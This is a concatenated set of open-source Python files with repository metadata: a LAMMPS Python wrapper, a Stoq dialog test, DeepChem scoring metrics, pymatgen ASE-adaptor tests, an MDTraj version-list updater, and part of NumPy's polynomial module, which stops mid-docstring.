r = {'thermo' : thermo_data }
runs.append(namedtuple('Run', list(r.keys()))(*list(r.values())))
elif in_run and len(columns) > 0:
values = [float(x) for x in line.split()]
for i, col in enumerate(columns):
current_run[col].append(values[i])
return runs
class PyLammps(object):
"""
More Python-like wrapper for LAMMPS (e.g., for iPython)
See examples/ipython for usage
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
if ptr:
if isinstance(ptr,PyLammps):
self.lmp = ptr.lmp
elif isinstance(ptr,lammps):
self.lmp = ptr
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
else:
self.lmp = lammps(name=name,cmdargs=cmdargs,ptr=None,comm=comm)
print("LAMMPS output is captured by PyLammps wrapper")
self._cmd_history = []
self.runs = []
def __del__(self):
if self.lmp: self.lmp.close()
self.lmp = None
def close(self):
if self.lmp: self.lmp.close()
self.lmp = None
def version(self):
return self.lmp.version()
def file(self,file):
self.lmp.file(file)
def write_script(self,filename):
""" Write LAMMPS script file containing all commands executed up until now """
with open(filename, "w") as f:
for cmd in self._cmd_history:
f.write("%s\n" % cmd)
def command(self,cmd):
self.lmp.command(cmd)
self._cmd_history.append(cmd)
def run(self, *args, **kwargs):
output = self.__getattr__('run')(*args, **kwargs)
self.runs += get_thermo_data(output)
return output
@property
def last_run(self):
if len(self.runs) > 0:
return self.runs[-1]
return None
@property
def atoms(self):
return AtomList(self)
@property
def system(self):
output = self.info("system")
d = self._parse_info_system(output)
return namedtuple('System', d.keys())(*d.values())
@property
def communication(self):
output = self.info("communication")
d = self._parse_info_communication(output)
return namedtuple('Communication', d.keys())(*d.values())
@property
def computes(self):
output = self.info("computes")
return self._parse_element_list(output)
@property
def dumps(self):
output = self.info("dumps")
return self._parse_element_list(output)
@property
def fixes(self):
output = self.info("fixes")
return self._parse_element_list(output)
@property
def groups(self):
output = self.info("groups")
return self._parse_groups(output)
@property
def variables(self):
output = self.info("variables")
vars = {}
for v in self._parse_element_list(output):
vars[v['name']] = Variable(self, v['name'], v['style'], v['def'])
return vars
def eval(self, expr):
value = self.lmp_print('"$(%s)"' % expr).strip()
try:
return float(value)
except ValueError:
return value
def _split_values(self, line):
return [x.strip() for x in line.split(',')]
def _get_pair(self, value):
return [x.strip() for x in value.split('=')]
def _parse_info_system(self, output):
lines = output[6:-2]
system = {}
for line in lines:
if line.startswith("Units"):
system['units'] = self._get_pair(line)[1]
elif line.startswith("Atom style"):
system['atom_style'] = self._get_pair(line)[1]
elif line.startswith("Atom map"):
system['atom_map'] = self._get_pair(line)[1]
elif line.startswith("Atoms"):
parts = self._split_values(line)
system['natoms'] = int(self._get_pair(parts[0])[1])
system['ntypes'] = int(self._get_pair(parts[1])[1])
system['style'] = self._get_pair(parts[2])[1]
elif line.startswith("Kspace style"):
system['kspace_style'] = self._get_pair(line)[1]
elif line.startswith("Dimensions"):
system['dimensions'] = int(self._get_pair(line)[1])
elif line.startswith("Orthogonal box"):
system['orthogonal_box'] = [float(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Boundaries"):
system['boundaries'] = self._get_pair(line)[1]
elif line.startswith("xlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("ylo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("zlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("Molecule type"):
system['molecule_type'] = self._get_pair(line)[1]
elif line.startswith("Bonds"):
parts = self._split_values(line)
system['nbonds'] = int(self._get_pair(parts[0])[1])
system['nbondtypes'] = int(self._get_pair(parts[1])[1])
system['bond_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Angles"):
parts = self._split_values(line)
system['nangles'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['angle_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Dihedrals"):
parts = self._split_values(line)
system['ndihedrals'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['dihedral_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Impropers"):
parts = self._split_values(line)
system['nimpropers'] = int(self._get_pair(parts[0])[1])
system['nimpropertypes'] = int(self._get_pair(parts[1])[1])
system['improper_style'] = self._get_pair(parts[2])[1]
return system
def _parse_info_communication(self, output):
lines = output[6:-3]
comm = {}
for line in lines:
if line.startswith("MPI library"):
comm['mpi_version'] = line.split(':')[1].strip()
elif line.startswith("Comm style"):
parts = self._split_values(line)
comm['comm_style'] = self._get_pair(parts[0])[1]
comm['comm_layout'] = self._get_pair(parts[1])[1]
elif line.startswith("Processor grid"):
comm['proc_grid'] = [int(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Communicate velocities for ghost atoms"):
comm['ghost_velocity'] = (self._get_pair(line)[1] == "yes")
elif line.startswith("Nprocs"):
parts = self._split_values(line)
comm['nprocs'] = int(self._get_pair(parts[0])[1])
comm['nthreads'] = int(self._get_pair(parts[1])[1])
return comm
def _parse_element_list(self, output):
lines = output[6:-3]
elements = []
for line in lines:
element_info = self._split_values(line.split(':')[1].strip())
element = {'name': element_info[0]}
for key, value in [self._get_pair(x) for x in element_info[1:]]:
element[key] = value
elements.append(element)
return elements
def _parse_groups(self, output):
lines = output[6:-3]
groups = []
group_pattern = re.compile(r"(?P<name>.+) \((?P<type>.+)\)")
for line in lines:
m = group_pattern.match(line.split(':')[1].strip())
group = {'name': m.group('name'), 'type': m.group('type')}
groups.append(group)
return groups
def lmp_print(self, s):
""" needed for Python2 compatibility, since print is a reserved keyword """
return self.__getattr__("print")(s)
def __dir__(self):
return ['angle_coeff', 'angle_style', 'atom_modify', 'atom_style', 'atom_style',
'bond_coeff', 'bond_style', 'boundary', 'change_box', 'communicate', 'compute',
'create_atoms', 'create_box', 'delete_atoms', 'delete_bonds', 'dielectric',
'dihedral_coeff', 'dihedral_style', 'dimension', 'dump', 'fix', 'fix_modify',
'group', 'improper_coeff', 'improper_style', 'include', 'kspace_modify',
'kspace_style', 'lattice', 'mass', 'minimize', 'min_style', 'neighbor',
'neigh_modify', 'newton', 'nthreads', 'pair_coeff', 'pair_modify',
'pair_style', 'processors', 'read', 'read_data', 'read_restart', 'region',
'replicate', 'reset_timestep', 'restart', 'run', 'run_style', 'thermo',
'thermo_modify', 'thermo_style', 'timestep', 'undump', 'unfix', 'units',
'variable', 'velocity', 'write_restart']
def __getattr__(self, name):
def handler(*args, **kwargs):
cmd_args = [name] + [str(x) for x in args]
with OutputCapture() as capture:
self.command(' '.join(cmd_args))
output = capture.output
if 'verbose' in kwargs and kwargs['verbose']:
print(output)
lines = output.splitlines()
if len(lines) > 1:
return lines
elif len(lines) == 1:
return lines[0]
return None
return handler
class IPyLammps(PyLammps):
"""
iPython wrapper for LAMMPS which adds embedded graphics capabilities
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
super(IPyLammps, self).__init__(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
def image(self, filename="snapshot.png", group="all", color="type", diameter="type",
size=None, view=None, center=None, up=None, zoom=1.0):
cmd_args = [group, "image", filename, color, diameter]
if size:
width = size[0]
height = size[1]
cmd_args += ["size", width, height]
if view:
theta = view[0]
phi = view[1]
cmd_args += ["view", theta, phi]
if center:
flag = center[0]
Cx = center[1]
Cy = center[2]
Cz = center[3]
cmd_args += ["center", flag, Cx, Cy, Cz]
if up:
Ux = up[0]
Uy = up[1]
Uz = up[2]
cmd_args += ["up", Ux, Uy, Uz]
if zoom:
cmd_args += ["zoom", zoom]
cmd_args.append("modify backcolor white")
self.write_dump(*cmd_args)
from IPython.core.display import Image
return Image('snapshot.png')
def video(self, filename):
from IPython.display import HTML
return HTML("<video controls><source src=\"" + filename + "\"></video>")
|
yidongxiainl/lammps
|
python/lammps.py
|
Python
|
gpl-2.0
| 35,412
|
[
"LAMMPS"
] |
2efadae96b621ae14fa44a9875c214d7835db8e481f5a84689eada5d086bfd68
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2012 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
from stoqlib.gui.dialogs.crashreportdialog import CrashReportDialog
from stoqlib.gui.test.uitestutils import GUITest
class TestCrashReportDialog(GUITest):
def test_show(self):
dialog = CrashReportDialog(None)
self.check_dialog(dialog._dialog, 'dialog-crash-report')
|
andrebellafronte/stoq
|
stoqlib/gui/test/test_crashreportdialog.py
|
Python
|
gpl-2.0
| 1,180
|
[
"VisIt"
] |
2a6d145ba5e48d4cf9a990e416d221dff1aea971c9f54a1584b98a14c5162ec3
|
"""Evaluation metrics."""
import numpy as np
from sklearn.metrics import matthews_corrcoef # noqa
from sklearn.metrics import recall_score # noqa
from sklearn.metrics import cohen_kappa_score
from sklearn.metrics import r2_score # noqa
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import precision_score # noqa
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import auc
from sklearn.metrics import jaccard_score
from sklearn.metrics import f1_score
from sklearn.metrics import roc_auc_score # noqa
from sklearn.metrics import accuracy_score # noqa
from sklearn.metrics import balanced_accuracy_score # noqa
from scipy.stats import pearsonr
# kappa_score is an alias for `sklearn.metrics.cohen_kappa_score`
kappa_score = cohen_kappa_score
def pearson_r2_score(y: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes Pearson R^2 (square of Pearson correlation).
Parameters
----------
y: np.ndarray
ground truth array
y_pred: np.ndarray
predicted array
Returns
-------
float
The Pearson-R^2 score.
"""
return pearsonr(y, y_pred)[0]**2
def jaccard_index(y: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes Jaccard Index which is the Intersection Over Union metric
which is commonly used in image segmentation tasks.
DEPRECATED: WILL BE REMOVED IN A FUTURE VERSION OF DEEEPCHEM. USE `jaccard_score` instead.
Parameters
----------
y: np.ndarray
ground truth array
y_pred: np.ndarray
predicted array
Returns
-------
score: float
The jaccard index. A number between 0 and 1.
"""
return jaccard_score(y, y_pred)
def pixel_error(y: np.ndarray, y_pred: np.ndarray) -> float:
"""An error metric in case y, y_pred are images.
Defined as 1 - the maximal F-score of pixel similarity, or squared
Euclidean distance between the original and the result labels.
Parameters
----------
y: np.ndarray
ground truth array
y_pred: np.ndarray
predicted array
Returns
-------
score: float
The pixel-error. A number between 0 and 1.
"""
return 1 - f1_score(y, y_pred)
def prc_auc_score(y: np.ndarray, y_pred: np.ndarray) -> float:
"""Compute area under precision-recall curve
Parameters
----------
y: np.ndarray
A numpy array of shape `(N, n_classes)` or `(N,)` with true labels
y_pred: np.ndarray
Of shape `(N, n_classes)` with class probabilities.
Returns
-------
float
The area under the precision-recall curve. A number between 0 and 1.
"""
precision, recall, _ = precision_recall_curve(y[:, 1], y_pred[:, 1])
return auc(recall, precision)
def rms_score(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes RMS error."""
return np.sqrt(mean_squared_error(y_true, y_pred))
def mae_score(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""Computes MAE."""
return mean_absolute_error(y_true, y_pred)
def bedroc_score(y_true: np.ndarray, y_pred: np.ndarray, alpha: float = 20.0):
"""Compute BEDROC metric.
BEDROC metric implemented according to Truchon and Bayley that modifies
the ROC score by allowing for a factor of early recognition.
Please confirm details from [1]_.
Parameters
----------
y_true: np.ndarray
Binary class labels. 1 for positive class, 0 otherwise
y_pred: np.ndarray
Predicted labels
alpha: float, default 20.0
Early recognition parameter
Returns
-------
float
Value in [0, 1] that indicates the degree of early recognition
Notes
-----
This function requires RDKit to be installed.
References
----------
.. [1] Truchon et al. "Evaluating virtual screening methods: good and bad metrics
for the “early recognition” problem." Journal of chemical information and modeling
47.2 (2007): 488-508.
"""
try:
from rdkit.ML.Scoring.Scoring import CalcBEDROC
except ModuleNotFoundError:
raise ImportError("This function requires RDKit to be installed.")
# validation
assert len(y_true) == len(y_pred), 'Number of examples do not match'
assert np.array_equal(
np.unique(y_true).astype(int),
[0, 1]), ('Class labels must be binary: %s' % np.unique(y_true))
yt = np.asarray(y_true)
yp = np.asarray(y_pred)
yt = yt.flatten()
yp = yp[:, 1].flatten() # Index 1 because one_hot predictions
scores = list(zip(yt, yp))
scores = sorted(scores, key=lambda pair: pair[1], reverse=True)
return CalcBEDROC(scores, 0, alpha)
def concordance_index(y_true: np.ndarray, y_pred: np.ndarray) -> float:
"""Compute Concordance index.
Statistical metric indicates the quality of the predicted ranking.
Please confirm details from [1]_.
Parameters
----------
y_true: np.ndarray
continous value
y_pred: np.ndarray
Predicted value
Returns
-------
float
score between [0,1]
References
----------
.. [1] Steck, Harald, et al. "On ranking in survival analysis:
Bounds on the concordance index." Advances in neural information processing systems (2008): 1209-1216.
"""
idx = np.argsort(y_true)
y_true = y_true[idx]
y_pred = y_pred[idx]
pairs = 0
correct_pairs = 0.0
for i in range(len(y_true)):
true_a = y_true[i]
pred_a = y_pred[i]
for j in range(i + 1, len(y_true)):
true_b = y_true[j]
pred_b = y_pred[j]
if true_a != true_b:
pairs += 1
if pred_a == pred_b:
correct_pairs += 0.5
elif pred_a < pred_b:
correct_pairs += true_a < true_b
else:
correct_pairs += true_a > true_b
assert pairs > 0, 'No pairs for comparision'
return correct_pairs / pairs
|
lilleswing/deepchem
|
deepchem/metrics/score_function.py
|
Python
|
mit
| 5,680
|
[
"RDKit"
] |
b0053931b5ba5a03b0d23a8a31680db77252ec44277a761ad6c62da2df1bba98
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import os
import unittest
import numpy as np
import pymatgen.io.ase as aio
from pymatgen.core.composition import Composition
from pymatgen.core.structure import Molecule
from pymatgen.io.vasp.inputs import Poscar
from pymatgen.util.testing import PymatgenTest
class AseAtomsAdaptorTest(unittest.TestCase):
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_structure(self):
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
ase_composition = Composition(atoms.get_chemical_formula())
self.assertEqual(ase_composition, structure.composition)
self.assertTrue(atoms.cell is not None and atoms.cell.any())
self.assertTrue(atoms.get_pbc() is not None and atoms.get_pbc().all())
self.assertEqual(atoms.get_chemical_symbols(), [s.species_string for s in structure])
self.assertFalse(atoms.has("initial_magmoms"))
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_structure_mags(self):
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
mags = [1.0] * len(structure)
structure.add_site_property("magmom", mags)
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
self.assertFalse(atoms.has("initial_magmoms"))
self.assertEqual(atoms.get_magnetic_moments().tolist(), mags)
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
mags = [1.0] * len(structure)
structure.add_site_property("magmom", mags)
initial_mags = [2.0] * len(structure)
structure.add_site_property("initial_magmom", initial_mags)
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
self.assertTrue(atoms.get_initial_magnetic_moments().tolist(), initial_mags)
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_structure_dyn(self):
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
structure.add_site_property("selective_dynamics", [[False] * 3] * len(structure))
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
self.assertEqual(atoms.constraints[0].get_indices().tolist(), [atom.index for atom in atoms])
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_molecule(self):
m = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
atoms = aio.AseAtomsAdaptor.get_atoms(m)
ase_composition = Composition(atoms.get_chemical_formula())
self.assertEqual(ase_composition, m.composition)
self.assertTrue(atoms.cell is None or not atoms.cell.any())
self.assertTrue(atoms.get_pbc() is None or not atoms.get_pbc().any())
self.assertEqual(atoms.get_chemical_symbols(), [s.species_string for s in m])
self.assertFalse(atoms.has("initial_magmoms"))
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_molecule_mags(self):
molecule = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
atoms = aio.AseAtomsAdaptor.get_atoms(molecule)
mags = [1.0] * len(molecule)
molecule.add_site_property("magmom", mags)
atoms = aio.AseAtomsAdaptor.get_atoms(molecule)
self.assertFalse(atoms.has("initial_magmoms"))
self.assertEqual(atoms.get_magnetic_moments().tolist(), mags)
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_molecule_dyn(self):
from ase.constraints import FixAtoms
molecule = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
molecule.add_site_property("selective_dynamics", [[False] * 3] * len(molecule))
atoms = aio.AseAtomsAdaptor.get_atoms(molecule)
self.assertEqual(atoms.constraints[0].get_indices().tolist(), [atom.index for atom in atoms])
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_structure(self):
from ase.io import read
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
struct = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(struct.formula, "Fe4 P4 O16")
self.assertEqual([s.species_string for s in struct], atoms.get_chemical_symbols())
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_structure_mag(self):
from ase.io import read
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
mags = [1.0] * len(atoms)
atoms.set_initial_magnetic_moments(mags)
structure = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(structure.site_properties["initial_magmom"], mags)
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "OUTCAR"))
structure = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(structure.site_properties["magmom"], atoms.get_magnetic_moments().tolist())
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_structure_dyn(self):
from ase.io import read
from ase.constraints import FixAtoms
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
atoms.set_constraint(FixAtoms(mask=[True] * len(atoms)))
structure = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(structure.site_properties["selective_dynamics"][-1][0], False)
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_molecule(self):
from ase.io import read
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
molecule = aio.AseAtomsAdaptor.get_molecule(atoms)
self.assertEqual(molecule.formula, "H2 C2")
self.assertEqual([s.species_string for s in molecule], atoms.get_chemical_symbols())
if __name__ == "__main__":
unittest.main()
|
vorwerkc/pymatgen
|
pymatgen/io/tests/test_ase.py
|
Python
|
mit
| 6,225
|
[
"ASE",
"VASP",
"pymatgen"
] |
6375b21b11b0e73a472c604b349376e1ef96721a0ea4355bee53b44d22127d15
|
import json
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
from mdtraj import version
if not version.release:
print("This is not a release.")
exit(0)
URL = 'http://www.mdtraj.org'
data = urlopen(URL + '/versions.json').read().decode()
versions = json.loads(data)
# new release so all the others are now old
for i in range(len(versions)):
versions[i]['latest'] = False
versions.append({
'version': version.short_version,
'display': version.short_version,
'url': "{base}/{version}".format(base=URL, version=version.short_version),
'latest': True})
with open("docs/_deploy/versions.json", 'w') as versionf:
json.dump(versions, versionf, indent=2)
|
leeping/mdtraj
|
devtools/travis-ci/update_versions_json.py
|
Python
|
lgpl-2.1
| 732
|
[
"MDTraj"
] |
f839d7199794d2aeebea7aeb6e8575b6a4fee8a86138f994f9cba97ec0ee87b2
|
"""
Functions to operate on polynomials.
"""
from __future__ import division, absolute_import, print_function
__all__ = ['poly', 'roots', 'polyint', 'polyder', 'polyadd',
'polysub', 'polymul', 'polydiv', 'polyval', 'poly1d',
'polyfit', 'RankWarning']
import functools
import re
import warnings
import numpy.core.numeric as NX
from numpy.core import (isscalar, abs, finfo, atleast_1d, hstack, dot, array,
ones)
from numpy.core import overrides
from numpy.core.overrides import set_module
from numpy.lib.twodim_base import diag, vander
from numpy.lib.function_base import trim_zeros
from numpy.lib.type_check import iscomplex, real, imag, mintypecode
from numpy.linalg import eigvals, lstsq, inv
array_function_dispatch = functools.partial(
overrides.array_function_dispatch, module='numpy')
@set_module('numpy')
class RankWarning(UserWarning):
"""
Issued by `polyfit` when the Vandermonde matrix is rank deficient.
For more information, a way to suppress the warning, and an example of
`RankWarning` being issued, see `polyfit`.
"""
pass
def _poly_dispatcher(seq_of_zeros):
return seq_of_zeros
@array_function_dispatch(_poly_dispatcher)
def poly(seq_of_zeros):
"""
Find the coefficients of a polynomial with the given sequence of roots.
Returns the coefficients of the polynomial whose leading coefficient
is one for the given sequence of zeros (multiple roots must be included
in the sequence as many times as their multiplicity; see Examples).
A square matrix (or array, which will be treated as a matrix) can also
be given, in which case the coefficients of the characteristic polynomial
of the matrix are returned.
Parameters
----------
seq_of_zeros : array_like, shape (N,) or (N, N)
A sequence of polynomial roots, or a square array or matrix object.
Returns
-------
c : ndarray
1D array of polynomial coefficients from highest to lowest degree:
``c[0] * x**(N) + c[1] * x**(N-1) + ... + c[N-1] * x + c[N]``
where c[0] always equals 1.
Raises
------
ValueError
If input is the wrong shape (the input must be a 1-D or square
2-D array).
See Also
--------
polyval : Compute polynomial values.
roots : Return the roots of a polynomial.
polyfit : Least squares polynomial fit.
poly1d : A one-dimensional polynomial class.
Notes
-----
Specifying the roots of a polynomial still leaves one degree of
freedom, typically represented by an undetermined leading
coefficient. [1]_ In the case of this function, that coefficient -
the first one in the returned array - is always taken as one. (If
for some reason you have one other point, the only automatic way
presently to leverage that information is to use ``polyfit``.)
The characteristic polynomial, :math:`p_a(t)`, of an `n`-by-`n`
matrix **A** is given by
:math:`p_a(t) = \\mathrm{det}(t\\, \\mathbf{I} - \\mathbf{A})`,
where **I** is the `n`-by-`n` identity matrix. [2]_
References
----------
.. [1] M. Sullivan and M. Sullivan, III, "Algebra and Trignometry,
Enhanced With Graphing Utilities," Prentice-Hall, pg. 318, 1996.
.. [2] G. Strang, "Linear Algebra and Its Applications, 2nd Edition,"
Academic Press, pg. 182, 1980.
Examples
--------
Given a sequence of a polynomial's zeros:
>>> np.poly((0, 0, 0)) # Multiple root example
array([1., 0., 0., 0.])
The line above represents z**3 + 0*z**2 + 0*z + 0.
>>> np.poly((-1./2, 0, 1./2))
array([ 1. , 0. , -0.25, 0. ])
The line above represents z**3 - z/4
>>> np.poly((np.random.random(1)[0], 0, np.random.random(1)[0]))
array([ 1. , -0.77086955, 0.08618131, 0. ]) # random
Given a square array object:
>>> P = np.array([[0, 1./3], [-1./2, 0]])
>>> np.poly(P)
array([1. , 0. , 0.16666667])
Note how in all cases the leading coefficient is always 1.
"""
seq_of_zeros = atleast_1d(seq_of_zeros)
sh = seq_of_zeros.shape
if len(sh) == 2 and sh[0] == sh[1] and sh[0] != 0:
seq_of_zeros = eigvals(seq_of_zeros)
elif len(sh) == 1:
dt = seq_of_zeros.dtype
# Let object arrays slip through, e.g. for arbitrary precision
if dt != object:
seq_of_zeros = seq_of_zeros.astype(mintypecode(dt.char))
else:
raise ValueError("input must be 1d or non-empty square 2d array.")
if len(seq_of_zeros) == 0:
return 1.0
dt = seq_of_zeros.dtype
a = ones((1,), dtype=dt)
for k in range(len(seq_of_zeros)):
a = NX.convolve(a, array([1, -seq_of_zeros[k]], dtype=dt),
mode='full')
if issubclass(a.dtype.type, NX.complexfloating):
# if complex roots are all complex conjugates, the roots are real.
roots = NX.asarray(seq_of_zeros, complex)
if NX.all(NX.sort(roots) == NX.sort(roots.conjugate())):
a = a.real.copy()
return a
def _roots_dispatcher(p):
return p
@array_function_dispatch(_roots_dispatcher)
def roots(p):
"""
Return the roots of a polynomial with coefficients given in p.
The values in the rank-1 array `p` are coefficients of a polynomial.
If the length of `p` is n+1 then the polynomial is described by::
p[0] * x**n + p[1] * x**(n-1) + ... + p[n-1]*x + p[n]
Parameters
----------
p : array_like
Rank-1 array of polynomial coefficients.
Returns
-------
out : ndarray
An array containing the roots of the polynomial.
Raises
------
ValueError
When `p` cannot be converted to a rank-1 array.
See also
--------
poly : Find the coefficients of a polynomial with a given sequence
of roots.
polyval : Compute polynomial values.
polyfit : Least squares polynomial fit.
poly1d : A one-dimensional polynomial class.
Notes
-----
The algorithm relies on computing the eigenvalues of the
companion matrix [1]_.
References
----------
.. [1] R. A. Horn & C. R. Johnson, *Matrix Analysis*. Cambridge, UK:
Cambridge University Press, 1999, pp. 146-7.
Examples
--------
>>> coeff = [3.2, 2, 1]
>>> np.roots(coeff)
array([-0.3125+0.46351241j, -0.3125-0.46351241j])
"""
# If input is scalar, this makes it an array
p = atleast_1d(p)
if p.ndim != 1:
raise ValueError("Input must be a rank-1 array.")
# find non-zero array entries
non_zero = NX.nonzero(NX.ravel(p))[0]
# Return an empty array if polynomial is all zeros
if len(non_zero) == 0:
return NX.array([])
# find the number of trailing zeros -- this is the number of roots at 0.
trailing_zeros = len(p) - non_zero[-1] - 1
# strip leading and trailing zeros
p = p[int(non_zero[0]):int(non_zero[-1])+1]
# casting: if incoming array isn't floating point, make it floating point.
if not issubclass(p.dtype.type, (NX.floating, NX.complexfloating)):
p = p.astype(float)
N = len(p)
if N > 1:
# build companion matrix and find its eigenvalues (the roots)
A = diag(NX.ones((N-2,), p.dtype), -1)
A[0,:] = -p[1:] / p[0]
roots = eigvals(A)
else:
roots = NX.array([])
# tack any zeros onto the back of the array
roots = hstack((roots, NX.zeros(trailing_zeros, roots.dtype)))
return roots
def _polyint_dispatcher(p, m=None, k=None):
return (p,)
@array_function_dispatch(_polyint_dispatcher)
def polyint(p, m=1, k=None):
"""
Return an antiderivative (indefinite integral) of a polynomial.
The returned order `m` antiderivative `P` of polynomial `p` satisfies
:math:`\\frac{d^m}{dx^m}P(x) = p(x)` and is defined up to `m - 1`
integration constants `k`. The constants determine the low-order
polynomial part
.. math:: \\frac{k_{m-1}}{0!} x^0 + \\ldots + \\frac{k_0}{(m-1)!}x^{m-1}
of `P` so that :math:`P^{(j)}(0) = k_{m-j-1}`.
Parameters
----------
p : array_like or poly1d
Polynomial to integrate.
A sequence is interpreted as polynomial coefficients, see `poly1d`.
m : int, optional
Order of the antiderivative. (Default: 1)
k : list of `m` scalars or scalar, optional
Integration constants. They are given in the order of integration:
those corresponding to highest-order terms come first.
If ``None`` (default), all constants are assumed to be zero.
If `m = 1`, a single scalar can be given instead of a list.
See Also
--------
polyder : derivative of a polynomial
poly1d.integ : equivalent method
Examples
--------
The defining property of the antiderivative:
>>> p = np.poly1d([1,1,1])
>>> P = np.polyint(p)
>>> P
poly1d([ 0.33333333, 0.5 , 1. , 0. ]) # may vary
>>> np.polyder(P) == p
True
The integration constants default to zero, but can be specified:
>>> P = np.polyint(p, 3)
>>> P(0)
0.0
>>> np.polyder(P)(0)
0.0
>>> np.polyder(P, 2)(0)
0.0
>>> P = np.polyint(p, 3, k=[6,5,3])
>>> P
poly1d([ 0.01666667, 0.04166667, 0.16666667, 3. , 5. , 3. ]) # may vary
Note that 3 = 6 / 2!, and that the constants are given in the order of
integrations. Constant of the highest-order polynomial term comes first:
>>> np.polyder(P, 2)(0)
6.0
>>> np.polyder(P, 1)(0)
5.0
>>> P(0)
3.0
"""
m = int(m)
if m < 0:
raise ValueError("Order of integral must be positive (see polyder)")
if k is None:
k = NX.zeros(m, float)
k = atleast_1d(k)
if len(k) == 1 and m > 1:
k = k[0]*NX.ones(m, float)
if len(k) < m:
raise ValueError(
"k must be a scalar or a rank-1 array of length 1 or >m.")
truepoly = isinstance(p, poly1d)
p = NX.asarray(p)
if m == 0:
if truepoly:
return poly1d(p)
return p
else:
# Note: this must work also with object and integer arrays
y = NX.concatenate((p.__truediv__(NX.arange(len(p), 0, -1)), [k[0]]))
val = polyint(y, m - 1, k=k[1:])
if truepoly:
return poly1d(val)
return val
def _polyder_dispatcher(p, m=None):
return (p,)
@array_function_dispatch(_polyder_dispatcher)
def polyder(p, m=1):
"""
Return the derivative of the specified order of a polynomial.
Parameters
----------
p : poly1d or sequence
Polynomial to differentiate.
A sequence is interpreted as polynomial coefficients, see `poly1d`.
m : int, optional
Order of differentiation (default: 1)
Returns
-------
der : poly1d
A new polynomial representing the derivative.
See Also
--------
polyint : Anti-derivative of a polynomial.
poly1d : Class for one-dimensional polynomials.
Examples
--------
The derivative of the polynomial :math:`x^3 + x^2 + x^1 + 1` is:
>>> p = np.poly1d([1,1,1,1])
>>> p2 = np.polyder(p)
>>> p2
poly1d([3, 2, 1])
which evaluates to:
>>> p2(2.)
17.0
We can verify this, approximating the derivative with
``(f(x + h) - f(x))/h``:
>>> (p(2. + 0.001) - p(2.)) / 0.001
17.007000999997857
